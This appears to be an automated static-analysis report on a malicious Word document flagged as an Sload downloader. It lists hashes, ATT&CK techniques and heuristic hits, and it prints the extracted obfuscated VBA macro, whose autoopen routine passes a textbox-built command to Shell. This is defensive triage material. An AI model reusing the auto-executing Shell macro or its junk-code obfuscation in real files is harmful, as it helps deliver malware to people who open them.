Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c216a2a1e9f88f88…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 86.2 KB
Created: 2018-12-17 19:03:00
Authoring application: Microsoft Office Word
First seen: 2019-02-10
MD5: deeb2f151b86973173797ce0e0b46d78
SHA-1: da0864c86f35f60736950398d07d000a7212ac9f
SHA-256: c216a2a1e9f88f8889125d88d1875b1bb333d73a5f3df9f63d238c5396594d06
Risk score: 292

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample contains VBA macros with an autoopen function that triggers a Shell() call. This call is used to execute PowerShell, indicating an attempt to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Sload-6787805-0' further supports this downloader behavior.

Heuristics (10)

  • ClamAV: Doc.Downloader.Sload-6787805-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6787805-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched lines in script:
      NGQJiLQjtGvrhOzZwkcp = 237184342 - nquztsMMwiVjvNQTvGjlVfo
      KztczVC = Array(pFzIi, spiJN, QANzX, Interaction.Shell(uQpNYiJjb, oqHlvSmZU), rXaKMb)
      juFXhmbJjtwuIWs = TKwGOqYAPsBvPVKPcPHpAN * Rnd(178945110 / Sin(FfjovhRjXAiaUNusVE)) / Wfd + Int(47943052 - Rnd(270584453 - Tan(239117126) * 211354698 - Cos(LihSsOCmFiZAiGkEibSYOmk)) / 309211900 * Sin(96159215 / Tan(141389556) / 95832597 / Hex(129900811))) + 311001563 + CStr(43313828) - 250703011 / CLng(257277220) * 168399542 - Fix(239888722 - Hex(162682785) * 38007934 / ChrW(PYUUOdrvMLmlAYNRH / 210281657))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
      Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
      Sub autoopen()
      mjhOCwI
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9725 bytes
SHA-256: 3fe12842e22fedfa720913539c7c28af01fc0d676f30f066faf29beff65844ec
Detection: ClamAV: No threats found
Obfuscation or payload: likely
131 of 168 identifiers look randomly generated (e.g. 'jamwhhowGdoqjGoEQjwjZUNf'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vVtcGjdj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
mjhOCwI
End Sub

Attribute VB_Name = "ElLATdz"
Function mjhOCwI()
On Error Resume Next
   hmhzzHzHUBjzAiCKDpnwYZH = ovMXupiSCzFuPIfu * Rnd(144073087 / Sin(jhzVXhIXzbZMWHfWLDvaMfXR)) / Wfd + Int(328547360 - Rnd(6287689 - Tan(167375852) * 54124807 - Cos(vJtcbqZNTYiOXpCtpcwPtwb)) / 336455421 * Sin(310925591 / Tan(237388599) / 29975333 / Hex(68068029))) + 212569910 + CStr(153767115) - 147336825 / CLng(55284238) * 2839169 - Fix(188774188 - Hex(30895912) * 119800554 / ChrW(juRFJrfQMppUXIYbtBwi / 307155017))
      rlPjwCWNulkNFijJjFwii = 308511323 - pIPwjHaGkkCCjqcvd
   QDOZEraZkjwKuQKj = WNwKUZUwDiKRBEzZqC * Rnd(22900160 / Sin(tksZlUSNzrGwdfCpJzviudA)) / Wfd + Int(58203262 - Rnd(103675116 - Tan(53175878) * 228623432 - Cos(wlDOHpZlVWYAHGwLcMn)) / 148274253 * Sin(13268002 / Tan(65641889) / 106510950 / Hex(287063948))) + 41053549 + CStr(164907048) - 341813305 / CLng(108811115) * 238067573 - Fix(236142102 - Hex(66346534) * 196988211 / ChrW(qOLnrroFQUmavXoipjDUM / 171175740))
      VMIhpIBlMuOQrnXkVzQlpd = 114587644 - BLmvDGJZQZqbjJzz
   GfuVuWVcStoIUlPacahzKYq = OQiisMFjsloiBINBTBIhKYQs * Rnd(40227701 / Sin(jamwhhowGdoqjGoEQjwjZUNf)) / Wfd + Int(199563649 - Rnd(61088394 - Tan(105956451) * 64987759 - Cos(qzqYsjiwvDHtEBjNcRCsGI)) / 216658505 * Sin(314205902 / Tan(169722302) / 170866430 / Hex(78731520))) + 90772778 + CStr(45285892) - 119514530 / CLng(158738237) * 115123358 - Fix(203927182 - Hex(63188815) * 104661583 / ChrW(zRqZKHUfpmVSdSBrNRji / 124818117))
      zSUQpdfpPvlFPLbciwnAGnE = 299017740 - oQjDNdhLDSXFtRqAzXZjY
Const oqHlvSmZU = 0
   FNdXYAuYfSwFoZjTsbEQKNip = WGUBXzsBsvFiLmCRMz * Rnd(96487638 / Sin(hiqitXSiqlsinBBtaX)) / Wfd + Int(52265628 - Rnd(135845076 - Tan(28003158) * 26817975 - Cos(daljpCwzOQWosQmHzfOKHDXu)) / 63437264 * Sin(243124762 / Tan(56115921) / 288470793 / Hex(272131987))) + 283810527 + CStr(302984916) - 102657819 / CLng(191159478) * 225421095 - Fix(81896350 - Hex(51035147) * 54876609 / ChrW(dbsniSRMJdnPIoqtoaDrXEu / 44652422))
      XWGLKEizICmSTZE = 192624241 - bfEZjFZjtmERTYhliHwKBzYI
   NWHcipzNNuBwRj = jOUPmiTWWRAzmtsbQTzuuWkh * Rnd(315693956 / Sin(DEkuobiLaQsArTtzlKds)) / Wfd + Int(73466187 - Rnd(130880093 - Tan(138372697) * 126020291 - Cos(iSmBMdnTJiOlcdZPaSciP)) / 183739144 * Sin(207884227 / Tan(2372949) / 304736350 / Hex(249689753))) + 175502733 + CStr(24002507) - 23601785 / CLng(119361053) * 234858253 - Fix(235072420 - Hex(116113482) * 62096453 / ChrW(JwKOmFhhofOIjEdk / 9938820))
      kVDmlHaCjPruiTTTPTQDqdi = 302696976 - VjdtzahirjoGWKCojVRqtAu
   chlzwZCHWwnnJhzGbn = QasrCUSJKcUVcZRm * Rnd(21689637 / Sin(FLFrPcWIvkCELOCuis)) / Wfd + Int(231813295 - Rnd(276764390 - Tan(232319125) * 187975477 - Cos(QsiCaLNrvtlVcEYLQUuZ)) / 224160201 * Sin(47384126 / Tan(41922716) / 112357616 / Hex(39346699))) + 125698641 + CStr(218140796) - 279364044 / CLng(163055783) * 19807792 - Fix(87267602 - Hex(252538106) * 190599817 / ChrW(pzkavwhsGKZsaqKhSVpD / 320138276))
      lNwHiXTsjwsvPYa = 276968871 - zrpAwrNsqfrkszZkjNX
   kchhMHJzwBGivzWFzwp = baZvcwNdPRPlXfX * Rnd(266288880 / Sin(PHifhOOHCtZirbzmkz)) / Wfd + Int(65273367 - Rnd(17983549 - Tan(245862422) * 32160041 - Cos(tfjilUKQbijjoLcuM)) / 68640737 * Sin(267946152 / Tan(172275408) / 31022241 / Hex(266230966))) + 337167070 + CStr(158322787) - 277800385 / CLng(119791230) * 337329054 - Fix(259045503 - Hex(209258431) * 90803928 / ChrW(kKtkzzjdmrczwHrJbIEzs / 320258624))
      KEjLoTVXlOwzZuacwchC = 227938870 - qCQwIXfaQtnfjjTlvJR
   jnihBmkmnXGvjCFKFkikTwi = QriBDiCpEhNqlmjX * Rnd(207776549 / Sin(vUQmSPjfqDKjXjF)) / Wfd + Int(132422976 - Rnd(110986468 - Tan(64870732) * 53186463 - Cos(jFUQrCpPZTEKELBNudZPR)) / 154990214 * Sin(290612491 / Tan(333871207) / 204680353 / Hex(136767723))) + 67823801 + CStr(194224433) - 245756627 / CLng(115733992) * 142657735 - Fix(149810141 - Hex(101961499) * 317845160 / ChrW(qAzvPaUGXzAiLirZnks / 114984367))
      NVlWsLdHzhvImKMu = 228778510 - ozRVzfqwutrimWiM
   oWuzNZaLWQrEPIOwLcVO = SGpbOEOaOuniNGIFIsAdm * Rnd(269489282 / Sin(BbEWjkZVXkuVQE)) / Wfd + Int(157867197 - Rnd(339243554 - Tan(137278996) * 77813981 - Cos(HVDVBBGrCjUkvdDozJihq)) / 268681070 * Sin(162250653 / Tan(107168881) / 327013524 / Hex(129138650))) + 246008806 + CStr(286813573) - 6533343 / CLng(242223674) * 297456609 - Fix(211631518 - Hex(119551612) * 13930326 / ChrW(hzFCVatXmDzwrNQYpmiuS / 321107932))
      YiPPqRqoStwVquHNHwRmMw = 137846326 - ikMDtnIOkKhUFLDFvPjFvra
   YKjVzfmurGjjoqnvwZojFVj = sqfmciFKOHwiBqB * Rnd(288128232 / Sin(XrBTIYMSFRJwOmCdbcHzARM)) / Wfd + Int(6476875 - Rnd(162339966 - Tan(112416982) * 215447093 - Cos(FuFXwmidfojSTTXNwOAVtFZ)) / 88643680 * Sin(305251463 / Tan(288414104) / 305396789 / Hex(39743865))) + 204045120 + CStr(5059855) - 305929214 / CLng(288683508) * 285148369 - Fix(120317201 - Hex(88255069) * 72047619 / ChrW(lAbDYznspjjtzEKQ / 73651560))
      zVsdErcziusaBG = 82051037 - KNZRVImUFLNMfw
   uRvRbDpTcIzXzvW = ZOaVKuFfYVvLicPwl * Rnd(216953007 / Sin(RYDpHXHHwJLcCipvm)) / Wfd + Int(296333806 - Rnd(288197006 - Tan(311211565) * 340304317 - Cos(QsFHikztBmQfFtWZ)) / 128059929 * Sin(327121153 / Tan(24580088) / 256927744 / Hex(46614767))) + 141993773 + CStr(84416827) - 299284451 / CLng(297384342) * 217665379 - Fix(294930902 - Hex(220596338) * 190585278 / ChrW(tlQFIKjztWIFIZ / 77080693))
      YwZNZurMEufLOzrSQw = 293176269 - PzkLpUEhiBMnhVIwIPdz
uQpNYiJjb = vVtcGjdj.TextBox1.Text + VYXif + YXOqwZ + EUusWGj + aUZWOMi + ifKlaGS + kPOvYd + KRlIIs + toiNcwpj + GiKWjrwq + tVDkjG
   AzTthZBoTUblDPkXcXvIcYi = hYpnUzhdaLYuvotiDLRHdzN * Rnd(286343147 / Sin(QSnBORcQZMIkNTWnwKsqqcn)) / Wfd + Int(199869327 - Rnd(83919331 - Tan(30115924) * 114393874 - Cos(bQhLzuEitbLtwdW)) / 185404756 * Sin(245327335 / Tan(332106819) / 277657825 / Hex(285991785))) + 314185826 + CStr(130937112) - 203170926 / CLng(266159104) * 136047482 - Fix(3840584 - Hex(21009746) * 265538652 / ChrW(JoJAWpIiwmTPrtXzwuMF / 76317888))
      OOZKHmtrzrPzknCtaoOzoLX = 181695960 - aHpVFqiTQavaLh
   SvTFawjrVSoICRLricVY = iBqZXtVibAQtniDiRYwZU * Rnd(145812108 / Sin(IiHPQaqSHYzjtdfC)) / Wfd + Int(19498799 - Rnd(67897136 - Tan(58159686) * 298770473 - Cos(XOPiHINDXzPMohvQd)) / 32939337 * Sin(51681857 / Tan(244066260) / 222642217 / Hex(60736573))) + 141992751 + CStr(275789529) - 333356675 / CLng(67041041) * 36002095 - Fix(249181363 - Hex(146655504) * 313302450 / ChrW(LcvkPshIRdPkZiXEv / 238759452))
      ZFAIkOtZkzDbhbjDjtzfYw = 316411445 - HSZwHbFKBkWKKULWWSzLOB
   sNErAMRVTIHvlwYQEKWUD = nvjIpmkwcoqzSqjnZbICW * Rnd(245061276 / Sin(jpkdwoAHRfGZIHrWf)) / Wfd + Int(248300235 - Rnd(151087753 - Tan(206767101) * 125218002 - Cos(oihkRlvMBPCjDTF)) / 61330886 * Sin(259504583 / Tan(52271142) / 183477217 / Hex(214471522))) + 160008477 + CStr(120181867) - 74648153 / CLng(114471116) * 152499578 - Fix(209402224 - Hex(223185466) * 35818747 / ChrW(RzFwbBFvMXPMFirXcEYR / 142918161))
      PDmhWTQMlDpijPwjbRzNakMU = 122765290 - TuubJoHSkCJuimfzmMWWuc
   iarzKtUbDRhPuNHLSdjWKX = DzpnJDKZCszdPSs * Rnd(208177444 / Sin(RSdwBlmzikDFiLfK)) / Wfd + Int(113333761 - Rnd(264344705 - Tan(326771885) * 133508019 - Cos(LYtrfXwkstZzTFs)) / 306007493 * Sin(82201051 / Tan(8264858) / 97166847 / Hex(23414663))) + 265255468 + CStr(200486126) - 122668049 / CLng(45025519) * 127877211 - Fix(132557551 - Hex(214825072) * 117973023 / ChrW(wivLGFtkEWNpOmrdIO / 42553770))
      PEmiQRjGmYLqiRtOimMzwK = 50862550 - AOZrbdLFaiDtrMuoYnzj
   OpVcbQzmEDPTAzu = YRwpEWCSSKLqrRad * Rnd(221877484 / Sin(jinZWUihwabbKp)) / Wfd + Int(222944109 - Rnd(230920611 - Tan(122977597) * 252276434 - Cos(wDrnCJQEHvmcmlzN)) / 79794982 * Sin(160676001 / Tan(329943432) / 314180399 / Hex(194912814))) + 70250016 + CStr(150068809) - 176778294 / CLng(184831806) * 285746405 - Fix(285792750 - Hex(2779474) * 146854116 / ChrW(HwoQjzsvkQFPXlJ / 323722870))
      pKbVKUqjnjQLKSQiwnnoWC = 15376261 - QnhqNmkRiCBpvmziwj
   rhjzaTLoWqlFRw = UfvWuPGLEGiobI * Rnd(273792684 / Sin(rKGAiAZUIBdBCf)) / Wfd + Int(207754434 - Rnd(1112193 - Tan(299442190) * 19217538 - Cos(rIEKllWfrsijjjntvLzXUGb)) / 96582806 * Sin(298357589 / Tan(249911647) / 31454168 / Hex(59116008))) + 163817761 + CStr(175702284) - 227756936 / CLng(312809480) * 162107062 - Fix(105689622 - Hex(326582490) * 304794514 / ChrW(zUPIUhcdRwUOlkowfXlhqQ / 338156999))
      NGQJiLQjtGvrhOzZwkcp = 237184342 - nquztsMMwiVjvNQTvGjlVfo
KztczVC = Array(pFzIi, spiJN, QANzX, Interaction.Shell(uQpNYiJjb, oqHlvSmZU), rXaKMb)
   juFXhmbJjtwuIWs = TKwGOqYAPsBvPVKPcPHpAN * Rnd(178945110 / Sin(FfjovhRjXAiaUNusVE)) / Wfd + Int(47943052 - Rnd(270584453 - Tan(239117126) * 211354698 - Cos(LihSsOCmFiZAiGkEibSYOmk)) / 309211900 * Sin(96159215 / Tan(141389556) / 95832597 / Hex(129900811))) + 311001563 + CStr(43313828) - 250703011 / CLng(257277220) * 168399542 - Fix(239888722 - Hex(162682785) * 38007934 / ChrW(PYUUOdrvMLmlAYNRH / 210281657))
      zmDXAjrwwlbwhiqTCzD = 5067410 - tzBKcivhYVREAIbM
   zaqBXIOWtrEtzLWmKEbuZs = scJvAJzVrRsiEqdVNZhG * Rnd(168345043 / Sin(niMhLzKatOGvzYNNNNtWMc)) / Wfd + Int(30468959 - Rnd(215941458 - Tan(115876474) * 316531364 - Cos(jOVrmFGpbiTwzKQXiXJsE)) / 52274585 * Sin(342097872 / Tan(78395443) / 135562079 / Hex(82396348))) + 20977198 + CStr(171917538) - 71986324 / CLng(193540655) * 210386919 - Fix(103733477 - Hex(99851992) * 123529254 / ChrW(MYWUprjmiuPtLvEaJHD / 187611001))
      OJXaCjiwCDjjjDzHDUA = 141178452 - VRFSriGCWHLqzwOztm
End Function